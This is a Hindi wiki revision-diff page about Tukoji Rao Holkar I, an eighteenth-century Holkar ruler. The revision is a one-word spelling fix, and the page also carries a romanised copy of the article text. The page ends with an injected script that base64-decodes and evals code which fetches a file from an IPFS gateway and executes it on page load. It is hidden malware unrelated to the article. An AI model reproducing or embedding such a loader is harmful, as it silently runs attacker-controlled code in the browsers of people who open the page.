Difference between revisions of "तुकोजी राव होल्कर प्रथम"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
(''''तुकोजी राव होल्कर प्रथम''' 1767 ई. में [[अहिल्याबाई होल्...' के साथ नया पन्ना बनाया)
 
m (Text replacement - "अर्थात " to "अर्थात् ")
 
Line 1: Line 1:
'''तुकोजी राव होल्कर प्रथम''' 1767 ई. में [[अहिल्याबाई होल्कर|रानी अहिल्याबाई]] द्वारा [[होल्कर वंश|होल्कर]] राज्य का सेनापति नियुक्त हुआ था। अहिल्याबाई की मृत्यु के बाद 1795 ई. में वह होल्कर राज्य का शासक बना। तुकोजी राव अपनी मृत्यु अर्थात 1797 ई. तक शासन करता रहा।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=191|url=}}</ref>
+
'''तुकोजी राव होल्कर प्रथम''' 1767 ई. में [[अहिल्याबाई होल्कर|रानी अहिल्याबाई]] द्वारा [[होल्कर वंश|होल्कर]] राज्य का सेनापति नियुक्त हुआ था। अहिल्याबाई की मृत्यु के बाद 1795 ई. में वह होल्कर राज्य का शासक बना। तुकोजी राव अपनी मृत्यु अर्थात् 1797 ई. तक शासन करता रहा।<ref>{{पुस्तक संदर्भ |पुस्तक का नाम=भारतीय इतिहास कोश |लेखक= सच्चिदानन्द भट्टाचार्य|अनुवादक= |आलोचक= |प्रकाशक=उत्तर प्रदेश हिन्दी संस्थान |संकलन= |संपादन= |पृष्ठ संख्या=191|url=}}</ref>
  
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}
 
{{लेख प्रगति|आधार=|प्रारम्भिक=प्रारम्भिक1|माध्यमिक= |पूर्णता= |शोध= }}

Latest revision as of 07:53, 7 November 2017

tukoji rav holkar pratham 1767 ee. mean rani ahilyabaee dvara holkar rajy ka senapati niyukt hua tha. ahilyabaee ki mrityu ke bad 1795 ee. mean vah holkar rajy ka shasak bana. tukoji rav apani mrityu arthath 1797 ee. tak shasan karata raha.[1]


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

tika tippani aur sandarbh

  1. bharatiy itihas kosh |lekhak: sachchidanand bhattachary |prakashak: uttar pradesh hindi sansthan |prishth sankhya: 191 |

sanbandhit lekh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>